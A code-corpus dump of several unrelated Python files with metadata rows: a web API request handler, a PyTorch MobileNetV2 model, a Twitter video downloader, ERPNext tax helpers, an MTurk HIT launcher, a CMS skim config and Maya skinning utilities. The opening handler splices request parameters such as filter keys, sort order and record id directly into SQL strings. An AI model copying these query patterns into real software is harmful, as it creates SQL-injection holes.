return total_count[0]['total_count'] if g.is_continue_exec else None
# 处理GET请求 -> 执行get获取数据 -> 获取数据集
def query_data(self):
default_sql = self.get_default_sql()
order_str = self.get_order_str()
pagination_str = self.get_pagination_str()
sql_default_query = f'{default_sql} {self.filter_str} {order_str} {pagination_str}'
# 获取数据集
data = SqlExecute.query_sql_data(sql_default_query, self.filter_args)
return data if g.is_continue_exec else None
# 处理GET请求 -> 执行get获取数据 -> 获取数据集 -> 获取默认查询语句
def get_default_sql(self):
view = g.args_data.get('view')
if view:
sql_query = self.module.views_query[view]['sql_query']
else:
sql_query = self.module.sql_query_default
return sql_query
# 处理GET请求 -> 执行get获取数据 -> 获取数据集 -> 获取过滤条件str 和 参数
def get_filter_str(self):
record_id = g.view_args.get('record_id')
filter_param = g.args_data.get('filter')
fuzzy_filter_param = g.args_data.get('fuzzyfilter')
filter_str = "where 1=1 "
filter_args = dict()
# 获取详细数据
if record_id:
filter_str += "and id=%(id)s "
filter_args['id'] = record_id
return (filter_str, filter_args)
# 模糊条件
if fuzzy_filter_param:
fuzzy_filter_list = fuzzy_filter_param.split(',')
for fuzzy_filter in fuzzy_filter_list:
fuzzy_key, fuzzy_val = fuzzy_filter.split('=')
filter_str += f"and ({fuzzy_key} like %({fuzzy_key})s) "
filter_args[fuzzy_key] = f"%{fuzzy_val}%"
# 精准条件查询
if filter_param:
filter_args_list = filter_param.split(',')
for filter in filter_args_list:
filter_key, filter_val = filter.split('=')
if filter_key in filter_args.keys(): continue
filter_str += f"and ({filter_key}=%({filter_key})s) "
filter_args[filter_key] = filter_val
return (filter_str, filter_args)
# 处理GET请求 -> 执行get获取数据 -> 获取数据集 -> 获取排序str
def get_order_str(self):
# 排序条件
order_param = g.args_data.get('order')
order_str = ""
if order_param:
order_str = order_param.replace('|', ',')
order_str = 'order by %s' % (order_str)
return order_str
# 处理GET请求 -> 执行get获取数据 -> 获取数据集 -> 获取分页参数str
def get_pagination_str(self):
# 获取分页语句
pagination_param = g.args_data.get('pagination')
pagination_str = ""
if pagination_param:
page_index, page_size = pagination_param.split(',')
page_index = 1 if int(page_index) < 1 else int(page_index)
page_size = 1 if int(page_size) < 1 else int(page_size)
pagination_str = 'limit %d, %d' % ((page_index - 1) * page_size, page_size)
return pagination_str if pagination_str else f"limit {default_limit_size}"
# 处理GET请求 -> get获取数据后处理
def after_deal_get(self):
return
# 处理POST请求
def deal_post_method(self, request):
# 初始化参数
self.init_general_data(request)
# 执行链
for deal_func in self.post_deal_func_link:
deal_func()
# 出现异常退出检查链
if not g.is_continue_exec:
break
return g.result
# [POST、PUT、DELETE] 操作权限检查
def check_operation_permissions(self):
return
# [POST、PUT]检查请求提交数据结构体
def check_request_data(self):
if not g.json_data:
g.is_continue_exec = False
g.result["message"] = '无要提交的数据~'
if 'data' not in g.json_data.keys():
g.is_continue_exec = False
g.result["message"] = '参数不完整:缺少data参数~'
# [POST、PUT]检查有效数据列合法性,清除无效数据
def check_column_data(self):
req_data = g.json_data["data"]
table_column = self.module.colnames
req_data_keys = list(req_data.keys())
for data_key in req_data_keys:
if (req_data[data_key] is None) or (len(str(req_data[data_key])) == 0):
del req_data[data_key]
continue
if (data_key not in table_column) and (data_key not in depth_post_map):
g.is_continue_exec = False
g.result['code'] = 0x11
g.result["message"] = f'非法列名:{data_key}~'
# POST 提交数据前操作
def before_deal_post(self):
return
# POST 提交数据
def deal_post_data(self):
sqlExecute = SqlExecute()
self.transact_post_before(sqlExecute)
if not g.is_continue_exec:
return
self.transact_post(sqlExecute)
if not g.is_continue_exec:
return
self.transact_post_after(sqlExecute)
if not g.is_continue_exec:
return
sqlExecute.commit()
# 插入数据前事务
def transact_post_before(self, cursor):
return
# 插入post数据
def transact_post(self, cursor):
insert_data = g.json_data['data'].copy()
if g.json_data.get("type", None) == "replace":
sql_insert = self.module.get_insert_sql(insert_data, is_replace=True)
else:
sql_insert = self.module.get_insert_sql(insert_data)
insert_data_keys = list(insert_data.keys())
for col_name in insert_data_keys:
if col_name in depth_post_map: del insert_data[col_name]
rowid = cursor.transact_commit_sql_data(sql_insert, insert_data)
g.result['rowid'] = rowid
# 插入数据后事务
def transact_post_after(self, cursor):
return
# POST 提交后操作
def after_deal_post(self):
return
# 处理PUT请求
def deal_put_method(self, request):
# 初始化参数
self.init_general_data(request)
# 执行链
for deal_func in self.put_deal_func_link:
deal_func()
# 出现异常退出检查链
if not g.is_continue_exec:
break
return g.result
# [PUT、DELETE] 修改删除记录前,检查记录唯一性
def check_unique_record(self):
record = g.view_args['record_id']
query_sql = f" {self.module.sql_query_default} where id={record}"
data = SqlExecute.query_sql_data(query_sql)
if not g.is_continue_exec:
return
if len(data) == 0:
g.is_continue_exec = False
g.result["message"] = "未匹配到要操作的数据"
return
# PUT 提交数据前操作
def before_deal_put(self):
return
# PUT 提交数据
def deal_put_data(self):
sqlExecute = SqlExecute()
self.transact_put_before(sqlExecute)
if not g.is_continue_exec:
return
self.transact_put(sqlExecute)
if not g.is_continue_exec:
return
self.transact_put_after(sqlExecute)
if not g.is_continue_exec:
return
sqlExecute.commit()
# put 事务中提交前
def transact_put_before(self, cursor):
pass
# put 事务提交
def transact_put(self, cursor):
record_id = g.view_args['record_id']
update_data = g.json_data['data'].copy()
sql_update = self.module.get_update_sql(update_data, record_id)
insert_data_keys = list(update_data.keys())
for col_name in insert_data_keys:
if col_name in depth_post_map: del update_data[col_name]
cursor.transact_commit_sql_data(sql_update, update_data)
if not g.is_continue_exec:
return
g.result['rowid'] = record_id
# put 事务中提交后
def transact_put_after(self, cursor):
pass
# PUT 提交后操作
def after_deal_put(self):
return
# 处理DELETE请求
def deal_delete_method(self, request):
# 初始化参数
self.init_general_data(request)
# 执行链
for deal_func in self.delete_deal_func_link:
deal_func()
# 出现异常退出检查链
if not g.is_continue_exec:
break
return g.result
# DELETE 删除数据前操作
def before_deal_delete(self):
return
# DELETE 删除数据
def deal_delete_data(self):
record_id = g.view_args['record_id']
sql_delete = self.module.get_delete_sql(record_id)
SqlExecute.commit_sql_data(sql_delete)
if not g.is_continue_exec:
return
g.result['rowid'] = record_id
# DELETE 删除后操作
def after_deal_delete(self):
return
| 32.890957
| 91
| 0.602248
| 1,549
| 12,367
| 4.491285
| 0.114267
| 0.010349
| 0.037947
| 0.051746
| 0.406353
| 0.330315
| 0.290068
| 0.265919
| 0.240621
| 0.189162
| 0
| 0.001516
| 0.306542
| 12,367
| 375
| 92
| 32.978667
| 0.809701
| 0.068246
| 0
| 0.345324
| 0
| 0
| 0.06064
| 0.009598
| 0
| 0
| 0.000349
| 0
| 0
| 1
| 0.136691
| false
| 0.007194
| 0.017986
| 0.043165
| 0.284173
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb2ec99c88e89e1bd90620cd1221b2fc2ec8cc12
| 4,921
|
py
|
Python
|
SmartDeal-Training/models/mobilenetv2_se_mask.py
|
VITA-Group/SmartDeal
|
8e1de77497eedbeea412a8c51142834c28a53709
|
[
"MIT"
] | 2
|
2021-07-20T02:48:35.000Z
|
2021-11-29T02:55:36.000Z
|
SmartDeal-Training/models/mobilenetv2_se_mask.py
|
VITA-Group/SmartDeal
|
8e1de77497eedbeea412a8c51142834c28a53709
|
[
"MIT"
] | null | null | null |
SmartDeal-Training/models/mobilenetv2_se_mask.py
|
VITA-Group/SmartDeal
|
8e1de77497eedbeea412a8c51142834c28a53709
|
[
"MIT"
] | null | null | null |
'''MobileNetV2 in PyTorch.
See the paper "Inverted Residuals and Linear Bottlenecks:
Mobile Networks for Classification, Detection and Segmentation" for more details.
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
from se import SEConv2d, SELinear
THRESHOLD = 4e-3
__all__ = ['SEMaskMobileNetV2']
def conv3x3(in_planes, out_planes, stride=1, groups=1):
"""3x3 convolution with padding"""
# return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
return SEConv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, groups=groups, bias=False, threshold=THRESHOLD)
def conv1x1(in_planes, out_planes, stride=1):
"""1x1 convolution"""
# return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
return SEConv2d(in_planes, out_planes, kernel_size=1, stride=stride,
bias=False, threshold=THRESHOLD)
class Block(nn.Module):
'''expand + depthwise + pointwise'''
def __init__(self, in_planes, out_planes, expansion, stride):
super(Block, self).__init__()
self.stride = stride
planes = expansion * in_planes
# self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, stride=1, padding=0, bias=False)
# self.bn1 = nn.BatchNorm2d(planes)
# self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, groups=planes, bias=False)
# self.bn2 = nn.BatchNorm2d(planes)
# self.conv3 = nn.Conv2d(planes, out_planes, kernel_size=1, stride=1, padding=0, bias=False)
# self.bn3 = nn.BatchNorm2d(out_planes)
self.conv1 = conv1x1(in_planes, planes, stride=1)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = conv3x3(planes, planes, stride=stride, groups=planes)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = conv1x1(planes, out_planes, stride=1)
self.bn3 = nn.BatchNorm2d(out_planes)
self.shortcut = nn.Sequential()
if stride == 1 and in_planes != out_planes:
self.shortcut = nn.Sequential(
# nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=1, padding=0, bias=False),
conv1x1(in_planes, out_planes, stride=1),
nn.BatchNorm2d(out_planes),
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
out = out + self.shortcut(x) if self.stride==1 else out
return out
class SEMaskMobileNetV2(nn.Module):
# (expansion, out_planes, num_blocks, stride)
cfg = [(1, 16, 1, 1),
(6, 24, 2, 1), # NOTE: change stride 2 -> 1 for CIFAR10
(6, 32, 3, 2),
(6, 64, 4, 2),
(6, 96, 3, 1),
(6, 160, 3, 2),
(6, 320, 1, 1)]
def __init__(self, num_classes=10, threshold=4e-3):
super(SEMaskMobileNetV2, self).__init__()
# NOTE: change conv1 stride 2 -> 1 for CIFAR10
# self.conv1 = nn.Conv2d(3, 32, kernel_size=3, stride=1, padding=1, bias=False)
# self.bn1 = nn.BatchNorm2d(32)
global THRESHOLD
THRESHOLD = threshold
print('threshold is set to {}'.format(threshold))
self.conv1 = conv3x3(3, 32, stride=1)
self.bn1 = nn.BatchNorm2d(32)
self.layers = self._make_layers(in_planes=32)
# self.conv2 = nn.Conv2d(320, 1280, kernel_size=1, stride=1, padding=0, bias=False)
# self.bn2 = nn.BatchNorm2d(1280)
self.conv2 = conv1x1(320, 1280, stride=1)
self.bn2 = nn.BatchNorm2d(1280)
# self.linear = nn.Linear(1280, num_classes)
self.linear = SELinear(1280, num_classes, threshold=THRESHOLD)
def _make_layers(self, in_planes):
layers = []
for expansion, out_planes, num_blocks, stride in self.cfg:
strides = [stride] + [1]*(num_blocks-1)
for stride in strides:
layers.append(Block(in_planes, out_planes, expansion, stride))
in_planes = out_planes
return nn.Sequential(*layers)
def forward(self, x, return_linear_input=False):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layers(out)
out = F.relu(self.bn2(self.conv2(out)))
# NOTE: change pooling kernel_size 7 -> 4 for CIFAR10
out = F.avg_pool2d(out, 4)
out = out.view(out.size(0), -1)
if return_linear_input:
linear_input = out
out = self.linear(out)
if return_linear_input:
return out, linear_input
else:
return out
def test():
net = SEMaskMobileNetV2()
i = 0
for m in net.modules():
if hasattr(m, 'mask'):
print(m.C.numel())
pass
x = torch.randn(2,3,32,32)
y = net(x)
print(y.size())
# test()
if __name__ == "__main__":
test()
| 36.451852
| 116
| 0.613696
| 661
| 4,921
| 4.426626
| 0.192133
| 0.058442
| 0.07177
| 0.06972
| 0.427204
| 0.405673
| 0.29255
| 0.203691
| 0.176692
| 0.103896
| 0
| 0.060473
| 0.260719
| 4,921
| 134
| 117
| 36.723881
| 0.743815
| 0.268441
| 0
| 0.091954
| 0
| 0
| 0.01433
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.091954
| false
| 0.011494
| 0.045977
| 0
| 0.241379
| 0.034483
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb2f3eb592211892766f130ad1032ee5dd774617
| 911
|
py
|
Python
|
twitter_video.py
|
keselekpermen69/build_scripts
|
110392778ad0a8585efa944100aa1c13ef28469e
|
[
"MIT"
] | 5
|
2020-08-19T05:44:25.000Z
|
2021-05-13T05:15:50.000Z
|
twitter_video.py
|
MrMissx/scripts
|
110392778ad0a8585efa944100aa1c13ef28469e
|
[
"MIT"
] | null | null | null |
twitter_video.py
|
MrMissx/scripts
|
110392778ad0a8585efa944100aa1c13ef28469e
|
[
"MIT"
] | null | null | null |
import requests
def get_link():
return input("Give me a twitter video link: ")
def download(url: str):
name = url.rsplit('/')[-1]
if("?tag" in name):
name = name.split('?')[0]
r = requests.get(url, allow_redirects=True)
open(name, 'wb').write(r.content)
def main():
payload = {'url': get_link()}
response = requests.request("POST",
"http://sosmeeed.herokuapp.com:80/api/twitter/video",
data=payload)
if response.status_code != 200:
print("Can't fetch video!")
return
res = response.json()
if not res["success"]:
print("Error! Please input correct URL")
return
url = res["data"]["data"][0]["link"] # use the highest quality
print(f"Downloading ({url})...")
download(url)
if __name__ == "__main__":
main()
| 24.621622
| 86
| 0.531284
| 107
| 911
| 4.411215
| 0.588785
| 0.029661
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012759
| 0.311745
| 911
| 37
| 87
| 24.621622
| 0.740032
| 0.025247
| 0
| 0.076923
| 0
| 0
| 0.227059
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.115385
| false
| 0
| 0.038462
| 0.038462
| 0.269231
| 0.115385
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb2fabace401a8d0a972f811af8b0a86ed348c85
| 2,951
|
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/regional/india/utils.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/regional/india/utils.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/regional/india/utils.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
import frappe, re
from frappe import _
from frappe.utils import cstr
from erpnext.regional.india import states, state_numbers
from erpnext.controllers.taxes_and_totals import get_itemised_tax, get_itemised_taxable_amount
def validate_gstin_for_india(doc, method):
if not hasattr(doc, 'gstin'):
return
if doc.gstin:
doc.gstin = doc.gstin.upper()
if doc.gstin != "NA":
p = re.compile("[0-9]{2}[a-zA-Z]{5}[0-9]{4}[a-zA-Z]{1}[1-9A-Za-z]{1}[Z]{1}[0-9a-zA-Z]{1}")
if not p.match(doc.gstin):
frappe.throw(_("Invalid GSTIN or Enter NA for Unregistered"))
if not doc.gst_state:
if doc.state in states:
doc.gst_state = doc.state
if doc.gst_state:
doc.gst_state_number = state_numbers[doc.gst_state]
if doc.gstin and doc.gstin != "NA" and doc.gst_state_number != doc.gstin[:2]:
frappe.throw(_("First 2 digits of GSTIN should match with State number {0}")
.format(doc.gst_state_number))
def get_itemised_tax_breakup_header(item_doctype, tax_accounts):
if frappe.get_meta(item_doctype).has_field('gst_hsn_code'):
return [_("HSN/SAC"), _("Taxable Amount")] + tax_accounts
else:
return [_("Item"), _("Taxable Amount")] + tax_accounts
def get_itemised_tax_breakup_data(doc):
itemised_tax = get_itemised_tax(doc.taxes)
itemised_taxable_amount = get_itemised_taxable_amount(doc.items)
if not frappe.get_meta(doc.doctype + " Item").has_field('gst_hsn_code'):
return itemised_tax, itemised_taxable_amount
item_hsn_map = frappe._dict()
for d in doc.items:
item_hsn_map.setdefault(d.item_code or d.item_name, d.get("gst_hsn_code"))
hsn_tax = {}
for item, taxes in itemised_tax.items():
hsn_code = item_hsn_map.get(item)
hsn_tax.setdefault(hsn_code, frappe._dict())
for tax_account, tax_detail in taxes.items():
hsn_tax[hsn_code].setdefault(tax_account, {"tax_rate": 0, "tax_amount": 0})
hsn_tax[hsn_code][tax_account]["tax_rate"] = tax_detail.get("tax_rate")
hsn_tax[hsn_code][tax_account]["tax_amount"] += tax_detail.get("tax_amount")
# set taxable amount
hsn_taxable_amount = frappe._dict()
for item, taxable_amount in itemised_taxable_amount.items():
hsn_code = item_hsn_map.get(item)
hsn_taxable_amount.setdefault(hsn_code, 0)
hsn_taxable_amount[hsn_code] += itemised_taxable_amount.get(item)
return hsn_tax, hsn_taxable_amount
def set_place_of_supply(doc, method):
if not frappe.get_meta('Address').has_field('gst_state'): return
if doc.doctype in ("Sales Invoice", "Delivery Note"):
address_name = doc.shipping_address_name or doc.customer_address
elif doc.doctype == "Purchase Invoice":
address_name = doc.shipping_address or doc.supplier_address
if address_name:
address = frappe.db.get_value("Address", address_name, ["gst_state", "gst_state_number"], as_dict=1)
doc.place_of_supply = cstr(address.gst_state_number) + "-" + cstr(address.gst_state)
# don't remove this function it is used in tests
def test_method():
'''test function'''
return 'overridden'
| 36.8875
| 102
| 0.74856
| 482
| 2,951
| 4.286307
| 0.226141
| 0.088093
| 0.03727
| 0.024685
| 0.163601
| 0.07938
| 0.056147
| 0.030978
| 0.030978
| 0
| 0
| 0.008475
| 0.120298
| 2,951
| 79
| 103
| 37.35443
| 0.787365
| 0.027109
| 0
| 0.033333
| 0
| 0.016667
| 0.145251
| 0.02514
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.083333
| 0
| 0.266667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb336072c83fb710a31348edb291a0b22c416bc1
| 706
|
py
|
Python
|
ProgsByDataset/UnpaywallMAG/create_unpaywall_refs.py
|
ashwath92/MastersThesis
|
f74755dc0c32f316da3c860dd5dbfa4c9cad97b3
|
[
"MIT"
] | 5
|
2020-11-05T07:11:54.000Z
|
2021-08-04T21:37:28.000Z
|
ProgsByDataset/UnpaywallMAG/create_unpaywall_refs.py
|
ashwath92/MastersThesis
|
f74755dc0c32f316da3c860dd5dbfa4c9cad97b3
|
[
"MIT"
] | null | null | null |
ProgsByDataset/UnpaywallMAG/create_unpaywall_refs.py
|
ashwath92/MastersThesis
|
f74755dc0c32f316da3c860dd5dbfa4c9cad97b3
|
[
"MIT"
] | 4
|
2020-11-05T06:04:38.000Z
|
2021-08-02T16:25:42.000Z
|
import re
import csv
# Unpaywall citing, cited list based on mag ids
unpaywall_citing_cited_file = open('AdditionalOutputs/unpaywallmag_references.tsv', 'w')
fieldnames = ['citing_mag_id', 'cited_mag_id']
writer = csv.DictWriter(unpaywall_citing_cited_file, delimiter="\t", fieldnames=fieldnames)
citation_pattern = re.compile(r'(=-=)([0-9]+)(-=-)')
with open('inputfiles/training_no20182019_with_contexts.txt', 'r') as file:
for line in file:
citing_paperid = line.split()[0]
for citation_marker in citation_pattern.finditer(line):
fetched_mag_id = citation_marker.group(2)
writer.writerow({'citing_mag_id': citing_paperid,'cited_mag_id': fetched_mag_id})
| 39.222222
| 93
| 0.730878
| 95
| 706
| 5.136842
| 0.505263
| 0.061475
| 0.122951
| 0.098361
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019802
| 0.141643
| 706
| 17
| 94
| 41.529412
| 0.785479
| 0.063739
| 0
| 0
| 0
| 0
| 0.251142
| 0.141553
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.166667
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb336c9971fca1cc78e0225c7dbfc79890eb6bc4
| 721
|
py
|
Python
|
Configuration/Skimming/python/PA_MinBiasSkim_cff.py
|
nistefan/cmssw
|
ea13af97f7f2117a4f590a5e654e06ecd9825a5b
|
[
"Apache-2.0"
] | null | null | null |
Configuration/Skimming/python/PA_MinBiasSkim_cff.py
|
nistefan/cmssw
|
ea13af97f7f2117a4f590a5e654e06ecd9825a5b
|
[
"Apache-2.0"
] | null | null | null |
Configuration/Skimming/python/PA_MinBiasSkim_cff.py
|
nistefan/cmssw
|
ea13af97f7f2117a4f590a5e654e06ecd9825a5b
|
[
"Apache-2.0"
] | null | null | null |
import FWCore.ParameterSet.Config as cms
# HLT dimuon trigger
import HLTrigger.HLTfilters.hltHighLevel_cfi
hltMinBiasHI = HLTrigger.HLTfilters.hltHighLevel_cfi.hltHighLevel.clone()
hltMinBiasHI.HLTPaths = ["HLT_PAL1MinimumBiasHF_OR_SinglePixelTrack_ForSkim_v*"]
hltMinBiasHI.throw = False
hltMinBiasHI.andOr = True
# selection of valid vertex
primaryVertexFilterForMinBias = cms.EDFilter("VertexSelector",
src = cms.InputTag("offlinePrimaryVertices"),
cut = cms.string("!isFake && abs(z) <= 25 && position.Rho <= 2"),
filter = cms.bool(True), # otherwise it won't filter the events
)
# MinBias skim sequence
minBiasSkimSequence = cms.Sequence(
hltMinBiasHI *
primaryVertexFilterForMinBias
)
| 32.772727
| 80
| 0.769764
| 76
| 721
| 7.210526
| 0.736842
| 0.069343
| 0.113139
| 0.124088
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0064
| 0.133148
| 721
| 21
| 81
| 34.333333
| 0.8704
| 0.142857
| 0
| 0
| 0
| 0
| 0.215334
| 0.120718
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.133333
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb360bb15c3aa59399389bed8b1e64bb7c548a75
| 3,696
|
py
|
Python
|
launch_hits.py
|
hinthornw/Pointing
|
e3cbaf2c5f54d20fe959406714b38634bc4bb3fe
|
[
"MIT"
] | null | null | null |
launch_hits.py
|
hinthornw/Pointing
|
e3cbaf2c5f54d20fe959406714b38634bc4bb3fe
|
[
"MIT"
] | null | null | null |
launch_hits.py
|
hinthornw/Pointing
|
e3cbaf2c5f54d20fe959406714b38634bc4bb3fe
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
import argparse
import json
from boto.mturk.price import Price
from boto.mturk.question import HTMLQuestion
from boto.mturk.connection import MTurkRequestError
import os
import simpleamt
import sys
import inspect
def printPlus(*args):
print(inspect.getouterframes(inspect.currentframe())[1][2], ": ", args)
DEBUG = printPlus
# Motorbike 20-40
# Dog 40-70
# Person 40-70
MINHITS = 40
MAXHITS = 60
if __name__ == '__main__':
parser = argparse.ArgumentParser(parents=[simpleamt.get_parent_parser()])
parser.add_argument('--hit_properties_file', type=argparse.FileType('r'))
parser.add_argument('--html_template')
parser.add_argument('--input_json_file', type=argparse.FileType('r'))
parser.add_argument('--input_cache', type=argparse.FileType('r'))
args = parser.parse_args()
im_names = []
if args.input_cache is not None:
#DEBUG("Cache: {}".format(args.input_cache))
for i, line in enumerate(args.input_cache):
im_names.append(json.loads(line.strip()))
#im_names = json.load(args.input_cache)
input_json_file = []
for i, line in enumerate(args.input_json_file):
input_json_file.append(line)
mtc = simpleamt.get_mturk_connection_from_args(args)
hit_properties = json.load(args.hit_properties_file)
hit_properties['reward'] = Price(hit_properties['reward'])
#hit_properties['Reward'] = str(hit_properties['Reward']).decode('utf-8')
simpleamt.setup_qualifications(hit_properties, mtc)
#DEBUG("After", hit_properties)
frame_height = hit_properties.pop('frame_height')
env = simpleamt.get_jinja_env(args.config)
template = env.get_template(args.html_template)
if args.hit_ids_file is None:
DEBUG('Need to input a hit_ids_file')
sys.exit()
DEBUG(args.hit_ids_file, args.input_cache)
if os.path.isfile(args.hit_ids_file):
DEBUG('hit_ids_file already exists')
sys.exit()
with open(args.hit_ids_file, 'w') as hit_ids_file:
# for i, line in enumerate(args.input_json_file):
print("Launching {} HITS".format(len(input_json_file)))
for i, line in enumerate(input_json_file):
if i < MINHITS:
continue
hit_input = json.loads(line.strip())
# In a previous version I removed all single quotes from the json dump.
# TODO: double check to see if this is still necessary.
template_params = {'input': json.dumps(hit_input)}
if len(im_names) > 0:
template_params['im_names'] = json.dumps(
im_names[i]) # json.dumps(im_names)
html = template.render(template_params)
html_question = HTMLQuestion(html, frame_height)
hit_properties['question'] = html_question
#DEBUG('Rendering Template {}'.format(i))
# with open('rendered_template{}.html'.format(i), 'w+') as f:
# f.write(html)
# This error handling is kinda hacky.
# TODO: Do something better here.
launched = False
while not launched:
try:
boto_hit = mtc.create_hit(**hit_properties)
launched = True
except MTurkRequestError as e:
DEBUG(e)
hit_id = boto_hit[0].HITId
hit_ids_file.write('%s\n' % hit_id)
DEBUG('Launched HIT ID: %s, %d' % (hit_id, i + 1))
if i > MAXHITS:
DEBUG(
"Debugging mode ON. Limiting HIT number to {}".format(
MAXHITS - MINHITS))
break
| 36.594059
| 83
| 0.628247
| 468
| 3,696
| 4.739316
| 0.326923
| 0.070334
| 0.036069
| 0.018034
| 0.10505
| 0.10505
| 0.10505
| 0.092426
| 0.036069
| 0.036069
| 0
| 0.00805
| 0.260552
| 3,696
| 100
| 84
| 36.96
| 0.803513
| 0.161526
| 0
| 0.028169
| 0
| 0
| 0.086957
| 0.006814
| 0
| 0
| 0
| 0.01
| 0
| 1
| 0.014085
| false
| 0
| 0.140845
| 0
| 0.15493
| 0.070423
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb36ee81af365dbd4ec4f2c01bf63d11e510fd29
| 2,405
|
py
|
Python
|
scripts/skinning/utils/skin.py
|
robertjoosten/skinning-tools
|
1f1ec6c092fdc1e39aa82a711a13a0041f9d5730
|
[
"MIT"
] | 31
|
2018-09-08T16:42:01.000Z
|
2022-03-31T12:31:21.000Z
|
scripts/skinning/utils/skin.py
|
robertjoosten/skinning-tools
|
1f1ec6c092fdc1e39aa82a711a13a0041f9d5730
|
[
"MIT"
] | null | null | null |
scripts/skinning/utils/skin.py
|
robertjoosten/skinning-tools
|
1f1ec6c092fdc1e39aa82a711a13a0041f9d5730
|
[
"MIT"
] | 11
|
2018-10-01T09:57:53.000Z
|
2022-03-19T06:53:02.000Z
|
from maya import cmds
from maya.api import OpenMaya
from maya.api import OpenMayaAnim
from functools import partial
from skinning.utils import api
from skinning.vendor import apiundo
def get_cluster_fn(node):
"""
Loop over an objects history and return the skin cluster api node that
is part dependency graph. The geometry provided will be extended to its
shapes.
:param str node:
:return: Skin cluster
:rtype: OpenMayaAnim.MFnSkinCluster
:raise RuntimeError: When no skin cluster can be found.
"""
shapes = cmds.listRelatives(node, shapes=True) or []
shapes.append(node)
for shape in shapes:
shape_obj = api.conversion.get_object(shape)
dependency_iterator = OpenMaya.MItDependencyGraph(
shape_obj,
OpenMaya.MFn.kSkinClusterFilter,
OpenMaya.MItDependencyGraph.kUpstream
)
while not dependency_iterator.isDone():
return OpenMayaAnim.MFnSkinCluster(dependency_iterator.currentNode())
else:
raise RuntimeError("Node '{}' has no skin cluster in its history.".format(node))
def get_cluster(node):
"""
Loop over an objects history and return the skin cluster node that is part
of the history. The geometry provided will be extended to its shapes.
:param str node:
:return: Skin cluster
:rtype: str
"""
skin_cluster_fn = get_cluster_fn(node)
return skin_cluster_fn.name()
# ----------------------------------------------------------------------------
def set_weights(skin_cluster, dag, components, influences, weights_new, weights_old=None):
"""
Set the skin weights via the API but add them to the undo queue using the
apiundo module. If weights old are not provided they are retrieved from
the skin cluster first.
:param OpenMayaAnim.MFnSkinCluster skin_cluster:
:param OpenMaya.MDagPath dag:
:param OpenMaya.MObject components:
:param OpenMaya.MIntArray influences:
:param OpenMaya.MDoubleArray weights_new:
:param OpenMaya.MDoubleArray weights_old:
"""
if weights_old is None:
weights_old, _ = skin_cluster.getWeights(dag, components)
